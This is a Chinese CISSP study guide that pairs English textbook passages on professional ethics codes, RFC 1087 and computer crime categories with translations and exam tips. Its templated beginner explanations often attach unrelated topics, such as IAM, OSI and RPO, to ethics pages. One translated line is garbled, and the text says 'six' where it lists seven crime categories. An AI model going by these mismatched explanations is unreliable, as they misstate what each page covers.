排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
学习单元 30 / PDF P1309

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

web publishing platform. Those attacks managed to deface more than 1.8 million web pages in one week. Hacktivists Recently, the world has seen a rise in the field of “hacktivism.” These attackers, known as hacktivists (a combination of hacker and activist), often combine political motivations with the thrill of hacking. They organize themselves loosely into groups with names like Anonymous and LulzSec and use automated tools to create large-scale DoS attacks with little knowledge required. Their purpose is to disrupt the activity of organizations that they differ with philosophically.

Ethics Security professionals hold themselves and each other to a high standard of conduct because of the sensitive positions of trust they occupy. The rules that govern personal conduct are collectively known as rules of ethics. They are the moral codes and rules of personal behavior that guide our day-to-day activities in any realm. In the world of business, ethics describe how a business should govern itself to ensure that its actions are appropriate and just. Business ethics cover a wide variety of topics, including financial dealings, conflicts of interest, nondiscrimination, and social responsibility.

In the world of cybersecurity, ethical codes guide the conduct of cybersecurity professionals to ensure that they act in a manner that is responsible and just. Several organizations have recognized the need for standard ethics rules, or codes, and have devised guidelines for ethical behavior. We present several codes of ethics in the following sections. These rules are not laws—they are minimum standards for professional behavior. They should provide you with a basis for sound, ethical judgment. We expect all security professionals to abide by these guidelines regardless of their area of specialty or employer.

Make sure you understand and agree with the codes of ethics outlined in the following sections. Organizational Code of Ethics Almost every organization has its own code of ethics that is published to employees to help guide their everyday work. These may come in the form of

中文直译 / 整理

网页发布平台。 这些攻击在一周内成功篡改了超过180万页网页。 黑客活动家 最近,世界见证了“黑客活动主义”领域的兴起。 这些攻击者被称为黑客活动 家(由黑客和活动家组合而成),他们常常将政治动机与黑客的刺激感结合起 来。 他们松散地组织成名为Anonymous和LulzSec等的团体,并使用自动化 工具在几乎无需专业知识的情况下发起大规模的拒绝服务攻击。 他们的目的是 扰乱在哲学上与他们意见相左的组织的活动。 伦理 由于安全专业人员所处的是高度敏感的信任职位,因此他们对自己和彼此 都保持着高标准的行为规范。 规范个人行为的规则统称为伦理准则。 它们是指 导我们在任何领域日常活动的道德准则和行为规范。 在商业世界中,伦理描述 了企业应如何自我管理,以确保其行为适当且公正。 商业伦理涵盖广泛的主题, 包括财务往来、利益冲突、非歧视和社会责任。 在网络安全领域,道德准则指导网络安全专业人员的行为,以确保他们以负责 任和公正的方式行事。 若干组织已认识到制定统一道德规范或准则的必要性, 并制定了道德行为指南。 我们在以下章节中介绍了若干道德准则。 这些规则并非法律——而是专业行为 的最低标准。

它们应为您提供可靠、合乎道德的判断依据。 我们要求所有安全 专业人员无论其专业领域或雇主为何,都必须遵守这些指南。 请确保您理解并 认同以下章节中所述的道德准则。 组织道德准则 几乎每个组织都有自己的道德规范,并发布给员工,以帮助指导他们的日常工作。 这些规范可能以

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 31 / PDF P1310

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

an official ethics statement, or they may be embodied in the policies and procedures that the organization uses to carry out routine business activities. In cases where an ethical code is published as a separate statement, it is usually high-level, designed to provide general guidance and direction rather than address specific situations. The organizational code of ethics may be supplemented by other policies and rules that provide detailed guidance on specific issues. For example, the U.S. government has a Code of Ethics for Government Service that is written into federal law.

Passed by Congress in 1980, this code says that any person in government service should: Put loyalty to the highest moral principles and to country above loyalty to persons, party, or Government department. Uphold the Constitution, laws, and regulations of the United States and of all governments therein and never be a party to their evasion. Give a full day's labor for a full day's pay; giving earnest effort and best thought to the performance of duties. Seek to find and employ more efficient and economical ways of getting tasks accomplished.

Never discriminate unfairly by the dispensing of special favors or privileges to anyone, whether for remuneration or not; and never accept, for himself or herself or for family members, favors or benefits under circumstances which might be construed by reasonable persons as influencing the performance of governmental duties. Make no private promises of any kind binding upon the duties of office, since a Government employee has no private word which can be binding on public duty. Engage in no business with the Government, either directly or indirectly, which is inconsistent with the conscientious performance of governmental duties.

Never use any information gained confidentially in the performance of governmental duties as a means of making private profit. Expose corruption wherever discovered. Uphold these principles, ever conscious that public office is a public trust.

中文直译 / 整理

正式的道德声明形式存在,也可能体现在组织用于开展日常业务活动的政策和程序 中。 在伦理准则作为独立声明发布的情况下,通常其内容较为宏观,旨在提供一般 性指导和方向,而非针对具体情境。 组织的伦理准则可由其他政策和规则补充, 以就具体问题提供详细指导。 例如,美国政府制定了《政府服务道德准则》,并将其写入联邦法律。 该准则 于1980年由国会通过,规定任何政府工作人员都应: 将对最高道德原则和国家的忠诚置于对个人、政党或政府部门的忠诚之上。 维护美国宪法、法律和法规,以及其中所有政府的宪法、法律和法规,绝不 参与规避这些法律和法规。 以全天的劳动换取全天的报酬; 认真努力并倾注最佳思考来履行职责。 努力寻找并采用更高效、更经济的方法来完成任务。 绝不可因给予任何人特殊恩惠或特权而进行不公平的歧视,无论是否获得 报酬; 也绝不可为自己、家人接受任何可能被合理人士视为影响政府职责 履行的恩惠或好处。 不得作出任何与公务职责相约束的私人承诺,因为政府雇员无权就公共职 责作出私人承诺。 不得直接或间接与政府开展任何与尽职尽责履行 政府职责相冲突的业务。

绝不可利用 y 信息 gained confidentiall y 在 performance of 政府职责以谋取私利。 揭露任何地方发现的腐败行为。 恪守这些原则,始终牢记公共职务是一种公众信任。

小白解释

场景先行:你是公司的安全负责人,正在读第 1310 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

职业伦理:职业伦理要求安全人员保护公众、诚实负责、合法合规。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 32 / PDF P1311

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

ISC2 Code of Professional Ethics The governing body that administers the CISSP certification is the International Information System Security Certification Consortium, or ISC2. The ISC2 Code of Ethics was developed to provide the basis for CISSP behavior. It is a simple code with a preamble and four canons. The following is a short summary of the major concepts of the Code of Ethics. All CISSP candidates should be familiar with the entire ISC2 Code of Ethics because they have to sign an agreement that they will adhere to this code. We won't cover the code in depth, but you can find further details about the ISC2's Code of Ethics at www.isc2.org/ethics.

You need to visit this site and read the entire code. Code of Ethics Preamble The Code of Ethics preamble is as follows: The safety and welfare of society and the common good, duty to our principals, and to each other, requires that we adhere, and be seen to adhere, to the highest ethical standards of behavior. Therefore, strict adherence to this Code is a condition of certification. Code of Ethics Canons The Code of Ethics (www.isc2.org/Ethics) includes the following canons: I. Protect society, the common good, necessary public trust and confidence, and the infrastructure. Security professionals have great social responsibility.

We are charged with the burden of ensuring that our actions benefit the common good. II. Act honorably, honestly, justly, responsibly, and legally. Integrity is essential to the conduct of our duties. We cannot carry out our duties effectively if others within our organization, the security community, or the general public have doubts about the accuracy of the guidance we provide or the motives behind our actions. ISC2

中文直译 / 整理

职业道德准则 负责管理CISSP认证的管理机构是国际信息系统安全认证联盟(ISC2)。 I SC2道德规范旨在为CISSP的行为提供基础,它是一份包含前言和四项准则的简 洁规范。 以下是对道德规范主要概念的简要总结。 所有CISSP候选人应熟悉整个ISC2道德准则,因为他们必须签署协 议,承诺遵守该准则。 我们不会深入讲解该准则,但您可以在 www.isc2.org/ethics 查阅ISC2道德准则的更多详细信息。 您需要访问该 网站并阅读完整准则。 道德准则序言 道德准则序言如下: 保障社会安全与福祉,维护公共利益,以及对我们的雇主和彼此的责 任,要求我们遵守并被视为遵守最高道德行为标准。 因此,严格遵守本准则是获得认证的条件。 道德准则条文 行为准则(www.isc2.org/Ethics)包含以下准则: I. 保护社会、公共利益、必要的公众信任与信心,以及基础设施。 安全专 业人员肩负着重大的社会责任。 我们有责任确保我们的行为有利于公共利 益。 II. 以荣誉、诚实、公正、负责任和合法的方式行事。 诚信是履行职责的根 本。

如果我们组织内部、安全界或公众对我们所提供的指导的准确性或行为 动机产生怀疑,我们就无法有效履行职责。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 33 / PDF P1312

第 1312 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

III. Provide diligent and competent service to principals. Although we have responsibilities to society as a whole, we also have specific responsibilities to those who have hired us to protect their infrastructure. We must ensure that we are in a position to provide unbiased, competent service to our organization. IV. Advance and protect the profession. Our chosen profession changes on a continuous basis. As security professionals, we must ensure that our knowledge remains current and that we contribute our own knowledge to the community's common body of knowledge.

Code of Ethics Complaints ISC2 members who encounter a potential violation of the Code of Ethics may report the possible violation to ISC2 for investigation by filing a formal ethics complaint. This complaint must identify the specific canon of the Code of Ethics that the member believes has been violated. Furthermore, complaints are only accepted from those who believe they have been injured by the alleged behavior. This personal injury provides standing to file a complaint and is determined based on the canon involved: Any member of the general public may file a complaint involving Canon I or II.

Only an employer or someone with a contracting relationship with the individual may file a complaint under Canon III. Other professionals may file a complaint under Canon IV. It is important to note that this is not limited to cybersecurity professionals. Anyone who is certified or licensed as a professional and subscribes to a code of ethics as part of that licensure or certification is eligible to file a Canon IV complaint. Complaints under the Code of Ethics must be in writing and in the form of a sworn affidavit. When ISC2 receives a properly submitted complaint, they will undertake a formal investigation.

For more information on the complaint and investigation process, see www.isc2.org/Ethics. Violations of the Code of Ethics may be punished by sanctions up to and including the revocation of an individual's certification. Ethics and the Internet III.

中文直译 / 整理

为委托人提供勤勉且称职的服务。 尽管我们对整个社会负有责任,但我 们对那些聘请我们保护其基础设施的人也负有特定责任。 我们必须确保自己 能够为本组织提供公正、称职的服务。 IV. 促进并保护本专业。 我们所选择的专业持续变化。 作为安全专业人员,我 们必须确保自己的知识保持更新,并将自身的知识贡献给社区的共同知识体系。 职业道德投诉 遇到潜在违反行为准则情况的ISC2成员,可通过提交正式的道德投诉向ISC2报 告该可能的违规行为。 该投诉必须明确指出成员所认为被违反的行为准则的具 体条款。 此外,仅接受那些认为自己因所指控行为而受到损害的人提交的投诉。 这种个人损害为提交投诉提供了资格,并根据所涉及的准则进行判定: 任何公众成员均可就第一条或第二条提出投诉。 只有雇主或与个人存在合同关系者方可根据第三条提出投诉。 其他专业人员可根据第四条提出投诉。 需注意,这不仅限于网络安全专业 人员。 任何获得认证或执照、并作为该认证或执照一部分遵守职业道德规 范的专业人士,均有资格提出第四条投诉。 根据道德规范提出的投诉必须以书面形式并以经宣誓的 affidavit 提交。 当 ISC2 收到适当提交的投诉后,将启动正式调查。

有关投诉和调查流程的更多信 息,请参阅 www.isc2.org/Ethics。 违反道德规范的行为可能受到包括撤销个人 认证在内的处罚。 伦理与互联网

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

职业伦理:职业伦理要求安全人员保护公众、诚实负责、合法合规。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1312 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

网络题先定位层次,再判断协议、设备或攻击位置。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 34 / PDF P1313

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

A variety of ethical frameworks also exist to help guide digital activities. These codes are not binding on any particular organization but are useful references for ethical decision-making. RFC 1087 In January 1989, the Internet Architecture Board (IAB) recognized that the Internet was rapidly expanding beyond the initial trusted community that created it. Understanding that misuse could occur as the Internet grew, IAB issued a statement of policy concerning the proper use of the Internet. The contents of this statement are valid even today.

It is important that you know the basic contents of the document, titled “Ethics and the Internet,” request for comments (RFC) 1087, because most codes of ethics can trace their roots back to this document. The statement is a brief list of practices considered unethical. Whereas a code of ethics states what you should do, this document outlines what you should not do.

RFC 1087 states that any activity with the following purposes is unacceptable and unethical: Seeks to gain unauthorized access to the resources of the Internet Disrupts the intended use of the Internet Wastes resources (people, capacity, computer) through such actions Destroys the integrity of computer-based information Compromises the privacy of users Ten Commandments of Computer Ethics The Computer Ethics Institute created its own code of ethics (http://cpsr.org/issues/ethics/cei). The Ten Commandments of Computer Ethics are as follows: 1. Thou shalt not use a computer to harm other people. 2. Thou shalt not interfere with other people's computer work. 3.

Thou shalt not snoop around in other people's computer files. 4. Thou shalt not use a computer to steal. 5. Thou shalt not use a computer to bear false witness.

中文直译 / 整理

还存在多种伦理框架,以帮助指导数字活动。 这些准则对任何特定组织均 不具约束力,但可作为伦理决策的有用参考。 RFC 1087 1989年1月,互联网架构委员会(IAB)认识到互联网正迅速超越其最初创建时 的可信社区。 鉴于互联网扩展过程中可能出现滥用行为,IAB发布了关于互联 网正当使用的政策声明。 该声明的内容至今依然有效。 您有必要了解题为《伦 理与互联网》的文件(请求评论 RFC 1087)的基本内容,因为大多数伦理准 则均可追溯至本文件。 该声明简要列出了被视为不道德的行为。 与伦理准则规定您应当做什么不同, 本文件明确了您不应当做什么。 RFC 1087指出,任何具有以下目的的活动都是 不可接受且不道德的: 试图未经授权访问互联网资源干扰互联网的预期用途 通过此类行为浪费资源(人员、带宽、计算机)破坏基于计算机的信 息的完整性 损害用户的隐私 计算机伦理十诫 计算机伦理研究所制定了自己的伦理准则( http://cpsr.org/issues/ethics/cei)。 计算机伦理十诫如下: 1. 你不可使用计算机伤害他人。 2. 你不可干扰他人的计算机工作。 3. 你不可窥探他人的计算机文件。

4. 你不可使用计算机盗窃。 5. 你不可使用计算机作伪证。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

RPO 问数据:最多丢到哪个时间点。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 35 / PDF P1314

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

6. Thou shalt not copy or use proprietary software for which you have not paid. 7. Thou shalt not use other people's computer resources without authorization or proper compensation. 8. Thou shalt not appropriate other people's intellectual output. 9. Thou shalt think about the social consequences of the program you are writing or the system you are designing. 10. Thou shalt always use a computer in ways that ensure consideration and respect for your fellow humans. Code of Fair Information Practices Another formative document that guides many ethical decision-making efforts is the Code of Fair Information Practices, developed by a government advisory committee in 1973.

This code outlines five principles for handling personal information in an ethical and responsible manner: 1. There must be no personal data record-keeping systems whose very existence is secret. 2. There must be a way for a person to find out what information about the person is in a record and how it is used. 3. There must be a way for a person to prevent information about the person that was obtained for one purpose from being used or made available for other purposes without the person's consent. 4. There must be a way for a person to correct or amend a record of identifiable information about the person. 5.

Any organization creating, maintaining, using, or disseminating records of identifiable personal data must assure the reliability of the data for their intended use and must take precautions to prevent misuses of the data. Summary Information security professionals must be familiar with the investigation process. This involves gathering and analyzing the evidence required to conduct an investigation. Security professionals should be familiar with the 6.

中文直译 / 整理

不得复制或使用未付费的专有软件。 7. 未经授权或未给予适当补偿,不得使用他人的计算机资源。 8. 不得窃取他人的智力成果。 9. 在编写程序或设计系统时,应思考其社会影响。 10. 应始终以确保对他人予以关怀与尊重的方式使用计算机。 公平信息实践准则 另一份指导许多伦理决策努力的奠基性文件是1973年由政府咨询委员会制定 的《公平信息实践准则》。 该准则概述了以合乎伦理和负责任的方式处理个人 信息的五项原则: 1. 不得存在任何其存在本身保密的个人数据记录系统。 2. 必须提供一种方式,使个人能够查知关于其自身的记录中包含哪些信息以及 这些信息如何被使用。 3. 必须提供一种方式,使个人能够防止为某一目的所获取的关于其自 身的信息,在未经其同意的情况下被用于或提供给其他目的。 4. 必须提供一种方式,使个人能够更正或修改关于其自身的可识别信息 记录。 5. 任何创建、维护、使用或传播可识别个人数据记录的组织,必须确保数 据在其预期用途中的可靠性,并采取预防措施以防止数据被滥用。 摘要 信息安全专业人员必须熟悉调查过程。 这包括收集和分析开展调查所需的证 据。 安全专业人员应熟悉

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 36 / PDF P1315

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

major categories of evidence, including real evidence, documentary evidence, and testimonial evidence. Electronic evidence is often gathered through the analysis of hardware, software, storage media, and networks. It is essential to gather evidence using appropriate procedures that do not alter the original evidence and preserve the chain of custody. Computer crimes are grouped into several major categories, and the crimes in each category share common motivations and desired results. Understanding what an attacker is after can help in properly securing a system. For example, military and intelligence attacks are launched to acquire secret information that could not be obtained legally.

Business attacks are similar except that they target civilian systems. Other types of attacks include financial attacks and terrorist attacks (which, in the context of computer crimes, are attacks designed to disrupt normal life). There are also grudge attacks, the purpose of which is to cause damage by destroying data or using information to embarrass an organization or person, and thrill attacks, launched by inexperienced crackers to compromise or disable a system. Although generally not sophisticated, thrill attacks can be annoying and costly. Finally, hacktivists take their potentially sophisticated skills and apply them to issues where they have a political interest.

The set of rules that govern your personal behavior is a code of ethics. There are several codes of ethics, from general to specific in nature, that security professionals can use to guide them. ISC2 makes the acceptance of its Code of Ethics a requirement for certification. Study Essentials Know the definition of computer crime. Computer crime is a crime (or violation of a law or regulation) that is directed against, or directly involves, a computer. Be able to list and explain the six categories of computer crimes.

Computer crimes are grouped into seven categories: military and intelligence attack, business attack, financial attack, terrorist attack, grudge attack, thrill attack, and hacktivist attack. Be able to explain the motive of each type of attack. Know the importance of collecting evidence. As soon you discover an incident, you must begin to collect evidence and as much information about the incident as possible. The evidence can be used in a subsequent legal

中文直译 / 整理

证据的主要类别,包括实物证据、文件证据和证人证言。 电子证据通常通过分 析硬件、软件、存储介质和网络来获取。 必须使用适当的程序收集证据,以不 改变原始证据并保持证据链的完整性。 计算机犯罪被分为若干主要类别,每个类别中的犯罪行为具有共同的动机和预 期结果。 了解攻击者的目标有助于正确地保护系统。 例如,军事和情报攻击旨在获取无法通过合法途径获得的机密信息。 商业攻击 与此类似,但其目标是民用系统。 其他类型的攻击包括金融攻击和恐怖袭击 (在计算机犯罪的语境中,指旨在扰乱正常生活的攻击)。 此外还有怨恨攻击, 其目的是通过破坏数据或利用信息使组织或个人蒙羞来造成损害; 还有刺激攻 击,由经验不足的破解者发起,旨在入侵或使系统失效。 尽管通常并不复杂, 但刺激攻击可能令人厌烦且代价高昂。 最后,黑客活动家将其可能高超的技术 应用于他们具有政治兴趣的议题。 规范个人行为的一套规则称为道德准则。 安全专业人员可参考多种从通用到具 体的道德准则来指导自身行为。 ISC2 将接受其道德准则作为认证的必要条件。 学习必备 了解计算机犯罪的定义。 计算机犯罪是指针对计算机或直接涉及计算机的犯 罪(或违反法律或法规的行为)。

能够列举并解释计算机犯罪的六种类别。 计算机犯罪分为七类:军事与情报攻 击、商业攻击、金融攻击、恐怖主义攻击、泄愤攻击、刺激攻击和黑客行动主 义攻击。 能够解释每种攻击的动机。 了解收集证据的重要性。 一旦发现事件,您必须立即开始收集证据,并尽可能 获取有关该事件的全部信息。 这些证据可用于后续的法律

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

程序:程序是一步一步怎么做。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

调查取证题看到证据,优先保护完整性和保管链。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
证据保管链 证据保管链记录证据从收集到提交的每一次接触和转移。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 37 / PDF P1316

第 1316 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

